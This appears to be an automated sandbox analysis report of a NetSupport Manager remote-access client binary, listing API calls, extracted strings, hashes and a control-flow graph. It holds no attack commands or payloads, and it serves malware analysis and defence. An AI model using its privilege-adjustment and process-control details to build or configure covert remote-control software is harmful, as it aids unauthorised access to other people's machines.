                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Library$AddressCreateFreeInitializeInstanceLoadProcSettingsUninitialize
                                                                                  • String ID: SHELL32.DLL$SHGetSettings
                                                                                  • API String ID: 4195908086-2348320231
                                                                                  • Opcode ID: 840c1eadb0258f47a734e7be087c5142de7588e2c7107701b0399a58d14c8a79
                                                                                  • Instruction ID: 591e2108fd72310e634c09c07143bf968b2bad8d72189eb08e80a39284cb5d12
                                                                                  • Opcode Fuzzy Hash: 840c1eadb0258f47a734e7be087c5142de7588e2c7107701b0399a58d14c8a79
                                                                                  • Instruction Fuzzy Hash: 1751A075A0020A9FDB40DFE5C9C4AAFFBB9FF89304F104629E516AB244E731A941CB61
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _memset
                                                                                  • String ID: NBCTL32.DLL$_License$serial_no
                                                                                  • API String ID: 2102423945-35127696
                                                                                  • Opcode ID: 1bc3c350b5695b2c8a219e67917739aeea91881a13f4a17e71b6933ab04c4b4d
                                                                                  • Instruction ID: b704a80906741011c15d1468992a84ddd821d027e1e1ff2b1c0992d848e69eb8
                                                                                  • Opcode Fuzzy Hash: 1bc3c350b5695b2c8a219e67917739aeea91881a13f4a17e71b6933ab04c4b4d
                                                                                  • Instruction Fuzzy Hash: 64B18E75E00209AFE714CFA8DC81BAEB7F5FF88304F148169E9499B295DB71A901CB90
                                                                                  APIs
                                                                                  • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,1102FCB2,?,00000000), ref: 1109E948
                                                                                  • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 1109E964
                                                                                  • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00ECE240,00ECE240,00ECE240,00ECE240,00ECE240,00ECE240,00ECE240,@,?,00000001,00000001), ref: 1109E990
                                                                                  • EqualSid.ADVAPI32(?,00ECE240,?,00000001,00000001), ref: 1109E9A3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: InformationToken$AllocateEqualInitialize
                                                                                  • String ID: @
                                                                                  • API String ID: 1878589025-935976969
                                                                                  • Opcode ID: df3ee88bcedd232c82b95f826b647b916292d8a5149356288e18f949a5596a8a
                                                                                  • Instruction ID: 8f268d00a2632c5decc73a479da56acc1190ac8ef7b7f04f8431c56e7d3a1b5e
                                                                                  • Opcode Fuzzy Hash: df3ee88bcedd232c82b95f826b647b916292d8a5149356288e18f949a5596a8a
                                                                                  • Instruction Fuzzy Hash: 22217131B0122EABEB10DBA4CC81BBEB7B8EB44708F100469E919D7184E671AD00CBA1
                                                                                  APIs
                                                                                  • SetUnhandledExceptionFilter.KERNEL32(1102E480,?,00000000), ref: 110310E4
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                  • String ID: Client32$NSMWClass$NSMWClass
                                                                                  • API String ID: 3192549508-611217420
                                                                                  • Opcode ID: 3211d65015dcc44e5dd59bdf27473333a197f9ceb9b14f7f353df042485d09a4
                                                                                  • Instruction ID: e21dedaf74b0f8cf59cf3be59171af9e644e6a1753dc25f7f597d2ad8de8aca1
                                                                                  • Opcode Fuzzy Hash: 3211d65015dcc44e5dd59bdf27473333a197f9ceb9b14f7f353df042485d09a4
                                                                                  • Instruction Fuzzy Hash: 44F04F7891112A9FCB06DFA9D890A9EF7E4AB4821CB508165E82587348EB30A605CB95
                                                                                  APIs
                                                                                  • GetCurrentProcess.KERNEL32(000F01FF,?,11030063,00000000,00000000,00080000,AD96CFBE,00080000,00000000,00000000), ref: 1109D46D
                                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 1109D474
                                                                                  • LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 1109D485
                                                                                  • AdjustTokenPrivileges.KERNELBASE(00000000), ref: 1109D4A9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                                                                                  • String ID:
                                                                                  • API String ID: 2349140579-0
                                                                                  • Opcode ID: b2ad1513cc86a00d87a5922bdef26ddabf3e928486d47d374c40a1db595ff72d
                                                                                  • Instruction ID: 1acc50509d1dc0efa8f8b8857b060522b21de2b31161cc556941a9c494b785c9
                                                                                  • Opcode Fuzzy Hash: b2ad1513cc86a00d87a5922bdef26ddabf3e928486d47d374c40a1db595ff72d
                                                                                  • Instruction Fuzzy Hash: AE015EB5640218ABD710DFA4CC89BAAF7BCFF44B05F10452DFA1597280D7B1AA04CB71
                                                                                  APIs
                                                                                  • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,?,00000000,00000000,00000000,1109E810,00000244,cant create events), ref: 1109D4EC
                                                                                  • CloseHandle.KERNEL32(?,00000000,1109E810,00000244,cant create events), ref: 1109D4F5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AdjustCloseHandlePrivilegesToken
                                                                                  • String ID:
                                                                                  • API String ID: 81990902-0
                                                                                  • Opcode ID: f88a9555f2545ca551a8130bcebdd0bed71c0aa378151d9f95003999b02a9da9
                                                                                  • Instruction ID: ae8e9f792a84aceb39bcb46fd7c9804e810fa9328d8f27f892a8d401e6504800
                                                                                  • Opcode Fuzzy Hash: f88a9555f2545ca551a8130bcebdd0bed71c0aa378151d9f95003999b02a9da9
                                                                                  • Instruction Fuzzy Hash: 55E0EC71654614ABE738CF28DC95FA677ECAF09B01F11495DF9A6D6180CA60F8408B64
                                                                                  APIs
                                                                                    • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                    • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                    • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                  • GetSystemMetrics.USER32(00002000), ref: 1102E7C4
                                                                                  • FindWindowA.USER32(NSMWClass,00000000), ref: 1102E985
                                                                                    • Part of subcall function 111100D0: GetCurrentThreadId.KERNEL32 ref: 11110166
                                                                                    • Part of subcall function 111100D0: InitializeCriticalSection.KERNEL32(-00000010,?,11031040,00000001,00000000), ref: 11110179
                                                                                    • Part of subcall function 111100D0: InitializeCriticalSection.KERNEL32(111F08F0,?,11031040,00000001,00000000), ref: 11110188
                                                                                    • Part of subcall function 111100D0: EnterCriticalSection.KERNEL32(111F08F0,?,11031040), ref: 1111019C
                                                                                    • Part of subcall function 111100D0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11031040), ref: 111101C2
                                                                                  • GetWindowThreadProcessId.USER32(00000000,?), ref: 1102E9C1
                                                                                  • OpenProcess.KERNEL32(00100400,00000000,?), ref: 1102E9E9
                                                                                  • IsILS.PCICHEK(?,?,View,Client,Bridge), ref: 1102ECAB
                                                                                    • Part of subcall function 11094B30: OpenProcessToken.ADVAPI32(00000000,00000018,00000000,00000000,00000000,00000000,?,?,1102EA18,00000000,?,00000100,00000000,00000000,00000000), ref: 11094B4C
                                                                                    • Part of subcall function 11094B30: OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,?,1102EA18,00000000,?,00000100,00000000,00000000,00000000), ref: 11094B59
                                                                                    • Part of subcall function 11094B30: CloseHandle.KERNEL32(00000000,00000000,?,00000100,00000000,00000000,00000000), ref: 11094B89
                                                                                  • SendMessageA.USER32(00000000,00000010,00000000,00000000), ref: 1102EA48
                                                                                  • WaitForSingleObject.KERNEL32(00000000,00007530), ref: 1102EA54
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 1102EA6C
                                                                                  • FindWindowA.USER32(NSMWClass,00000000), ref: 1102EA79
                                                                                  • GetWindowThreadProcessId.USER32(00000000,?), ref: 1102EA9B
                                                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 1102E7F6
                                                                                    • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                    • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                    • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                    • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                  • LoadIconA.USER32(11000000,000004C1), ref: 1102EE45
                                                                                  • LoadIconA.USER32(11000000,000004C2), ref: 1102EE55
                                                                                  • DestroyCursor.USER32(00000000), ref: 1102EE7E
                                                                                  • DestroyCursor.USER32(00000000), ref: 1102EE92
                                                                                  • GetVersion.KERNEL32(?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000,?,?,View,Client,Bridge), ref: 1102F45F
                                                                                  • GetVersionExA.KERNEL32(?,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000,?,?,View,Client,Bridge), ref: 1102F4B2
                                                                                  • Sleep.KERNEL32(00000064,Client,*StartupDelay,00000000,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000), ref: 1102FA52
                                                                                  • PeekMessageA.USER32(?,00000000,00000000,00000009,00000001), ref: 1102FA8C
                                                                                    • Part of subcall function 11132BF0: wsprintfA.USER32 ref: 11132C60
                                                                                    • Part of subcall function 11132BF0: GetTickCount.KERNEL32 ref: 11132C91
                                                                                    • Part of subcall function 11132BF0: SHGetFolderPathA.SHFOLDER(00000000,0000002B,00000000,00000000,?), ref: 11132CA4
                                                                                    • Part of subcall function 11132BF0: GetTickCount.KERNEL32 ref: 11132CAC
                                                                                    • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                  • DispatchMessageA.USER32(?), ref: 1102FA96
                                                                                  • PeekMessageA.USER32(?,00000000,00000000,00000009,00000001), ref: 1102FAA8
                                                                                  • CloseHandle.KERNEL32(00000000,11027270,00000001,00000000,?,?,?,?,?,00000000,?,?,?,?,?,00000000), ref: 1102FD40
                                                                                  • GetCurrentProcess.KERNEL32(00000000,Client,*PriorityClass,00000080,00000000,Client,*ScreenScrape,00000000,00000000,?,?,?,?,?,00000000), ref: 1102FD78
                                                                                  • SetPriorityClass.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000), ref: 1102FD7F
                                                                                  • SetWindowPos.USER32(00020492,000000FF,00000000,00000000,00000000,00000000,00000013,Client,AlwaysOnTop,00000000,00000000), ref: 1102FDB5
                                                                                  • CloseHandle.KERNEL32(00000000,11059C10,00000001,00000000,?,?,?,?,?,?,?,?,00000000), ref: 1102FE36
                                                                                  • wsprintfA.USER32 ref: 1102FFA5
                                                                                  • PostMessageA.USER32(NSMWControl32,00000000,Default,UseIPC,00000001,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 110300F7
                                                                                  • PostMessageA.USER32(00000000,00000693,00000000,00000000), ref: 1103010D
                                                                                  • PostMessageA.USER32(00000000,00000693,00000000,00000000), ref: 11030136
                                                                                  • PostMessageA.USER32(00000000,00000693,00000000,00000000), ref: 1103015F
                                                                                    • Part of subcall function 111281B0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,AD96CFBE,00000002,75922EE0), ref: 1112820A
                                                                                    • Part of subcall function 111281B0: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 11128217
                                                                                    • Part of subcall function 111281B0: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00000000), ref: 1112825E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Message$Process$Window$CloseCreateEventHandlePostwsprintf$CriticalOpenSectionThread$CountCurrentCursorDestroyFindIconInitializeLoadObjectPeekSingleTickTokenVersionWait$ClassDispatchEnterErrorExitFolderLastMetricsPathPrioritySendSleepSystem__wcstoi64_malloc_memset
                                                                                  • String ID: *BeepSound$*BeepUsingSpeaker$*ListenPort$*PriorityClass$*ScreenScrape$*StartupDelay$878411$AlwaysOnTop$AssertTimeout$Audio$Bridge$CLIENT32.CPP$CabinetWClass$Client$Default$DisableAudio$DisableAudioFilter$DisableConsoleClient$DisableHelp$DisableJoinClass$DisableJournal$DisableJournalMenu$DisableReplayMenu$DisableRequestHelp$DisableRunplugin$DisableTSAdmin$EnableGradientCaptions$EnableSmartcardAuth$EnableSmartcardLogon$Error x%x reading nsm.lic, sesh=%d$Error. Could not load transports - perhaps another client is running$Error. Wrong hardware. Terminating$Found new explorer hwnd=x%x h=%d,w=%d,style=x%x (%s)$Found old explorer hwnd=x%x h=%d,w=%d,style=x%x (%s)$General$Global\NSMWClassAdmin$Info. Client already running, pid=%d (x%x)$Info. Client running as user=%s, type=%d$Info. Trying to close client$Intel error "%s"$IsILS returned %d, isvistaservice %d$LSPloaded=%d, WFPloaded=%d$MiniDumpType$NSA.LIC$NSM.LIC$NSMWClass$NSMWClassVista$NSMWControl32$NSSWControl32$NSTWControl32$NeedsReinstall$NoFTWhenLoggedOff$OS2$Ready$RestartAfterError$ScreenScrape$Session shutting down, exiting...$ShowKBEnable$TCPIP$TraceIPC$TracePriv$UseIPC$UseLegacyPrintCapture$UseNTSecurity$V12.00.8$V12.10.8$View$Windows 10$Windows 10 x64$Windows 2000$Windows 2003$Windows 2003 x64$Windows 2008$Windows 2008 x64$Windows 2012$Windows 2012 R2$Windows 2016$Windows 7$Windows 7 x64$Windows 8$Windows 8 x64$Windows 8.1$Windows 8.1 x64$Windows 95$Windows 98$Windows CE$Windows Ding.wav$Windows Millennium$Windows NT$Windows Vista$Windows Vista x64$Windows XP$Windows XP Ding.wav$Windows XP x64$\Explorer.exe$_debug$_debug$cl32main$client32$closed ok$gClient.hNotifyEvent$hClientRunning = %x, pid=%d (x%x)$istaService$istaUI$pcicl32$win8ui
                                                                                  • API String ID: 1099283604-1539223085
                                                                                  • Opcode ID: a9e638ff69f1124c323ad2d8e1e7c75ea6f1f7704d0975bff64711fd33ab6bf8
                                                                                  • Instruction ID: 27af1d42f1b4f6ddb2c14770db7fbacfca67435089f052a3aa779117de4136e9
                                                                                  • Opcode Fuzzy Hash: a9e638ff69f1124c323ad2d8e1e7c75ea6f1f7704d0975bff64711fd33ab6bf8
                                                                                  • Instruction Fuzzy Hash: 3CE25D75F0022AABEF15DBE4DC80FADF7A5AB4474CF904068E925AB3C4D770A944CB52

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 994 1102db00-1102db50 call 1110f420 997 1102db52-1102db66 call 11142a60 994->997 998 1102db68 994->998 1000 1102db6e-1102dbb3 call 11142290 call 11142ac0 997->1000 998->1000 1006 1102dd53-1102dd62 call 11144dc0 1000->1006 1007 1102dbb9 1000->1007 1013 1102dd68-1102dd78 1006->1013 1008 1102dbc0-1102dbc3 1007->1008 1011 1102dbc5-1102dbc7 1008->1011 1012 1102dbe8-1102dbf1 1008->1012 1014 1102dbd0-1102dbe1 1011->1014 1015 1102dbf7-1102dbfe 1012->1015 1016 1102dd24-1102dd3d call 11142ac0 1012->1016 1017 1102dd7a 1013->1017 1018 1102dd7f-1102dd93 call 1102cc10 1013->1018 1014->1014 1019 1102dbe3 1014->1019 1015->1016 1020 1102dcf3-1102dd08 call 11162de7 1015->1020 1021 1102dc05-1102dc07 1015->1021 1022 1102dd0a-1102dd1f call 11162de7 1015->1022 1023 1102dc9a-1102dccd call 111618c1 call 11142290 1015->1023 1024 1102dcdb-1102dcf1 call 11164010 1015->1024 1025 1102dc8b-1102dc95 1015->1025 1026 1102dccf-1102dcd9 1015->1026 1027 1102dc4c-1102dc52 1015->1027 1028 1102dc7c-1102dc86 1015->1028 1016->1008 1046 1102dd43-1102dd45 1016->1046 1017->1018 1041 1102dd98-1102dd9d 1018->1041 1019->1016 1020->1016 1021->1016 1037 1102dc0d-1102dc47 call 111618c1 call 11142290 call 1102cc10 1021->1037 1022->1016 1023->1016 1024->1016 1025->1016 1026->1016 1030 1102dc54-1102dc68 call 11162de7 1027->1030 1031 1102dc6d-1102dc77 1027->1031 1028->1016 1030->1016 1031->1016 1037->1016 1048 1102de43-1102de5d call 111463d0 1041->1048 1049 1102dda3-1102ddc8 call 110b7920 call 11146450 1041->1049 1046->1048 1052 1102dd4b-1102dd51 1046->1052 1061 1102deb3-1102debf call 1102b4f0 1048->1061 1062 1102de5f-1102de78 call 1105dd10 1048->1062 1069 1102ddd3-1102ddd9 1049->1069 1070 1102ddca-1102ddd1 1049->1070 1052->1006 1052->1013 1074 1102dec1-1102dec8 1061->1074 1075 1102de98-1102de9f 1061->1075 1062->1061 1073 1102de7a-1102de8c 1062->1073 1076 1102dddb-1102dde2 call 11027d60 1069->1076 1077 1102de39 1069->1077 1070->1048 1073->1061 1089 1102de8e 1073->1089 1078 1102dea5-1102dea8 1074->1078 1080 1102deca-1102ded4 1074->1080 1075->1078 1079 1102e0aa-1102e0cb GetComputerNameA 1075->1079 1076->1077 1088 1102dde4-1102de16 1076->1088 1077->1048 1083 1102deaa-1102deb1 call 110b7920 1078->1083 1084 1102ded9 1078->1084 1086 1102e103-1102e109 1079->1086 1087 1102e0cd-1102e101 call 11027c30 1079->1087 1080->1079 1093 1102dedc-1102dfb6 call 110278e0 call 11027be0 call 110278e0 * 2 LoadLibraryA GetProcAddress 1083->1093 1084->1093 1091 1102e10b-1102e110 1086->1091 1092 1102e13f-1102e152 call 11164010 1086->1092 1087->1086 1113 1102e157-1102e163 1087->1113 1107 1102de20-1102de2f call 110f6080 1088->1107 1108 1102de18-1102de1e 1088->1108 1089->1075 1098 1102e116-1102e11a 1091->1098 1105 1102e347-1102e36a 1092->1105 1146 1102e07a-1102e082 SetLastError 1093->1146 1147 1102dfbc-1102dfd3 1093->1147 1103 1102e136-1102e138 1098->1103 1104 1102e11c-1102e11e 1098->1104 1112 1102e13b-1102e13d 1103->1112 1110 1102e132-1102e134 1104->1110 1111 1102e120-1102e126 1104->1111 1127 1102e392-1102e39a 1105->1127 1128 1102e36c-1102e372 1105->1128 1115 1102de32-1102de34 call 1102d330 1107->1115 1108->1107 1108->1115 1110->1112 1111->1103 1117 1102e128-1102e130 1111->1117 1112->1092 1112->1113 1118 1102e165-1102e17a call 110b7920 call 11029bd0 1113->1118 1119 1102e17c-1102e18f call 11081a70 1113->1119 1115->1077 1117->1098 1117->1110 1149 1102e1d3-1102e1ec call 11081a70 1118->1149 1139 1102e191-1102e1b4 1119->1139 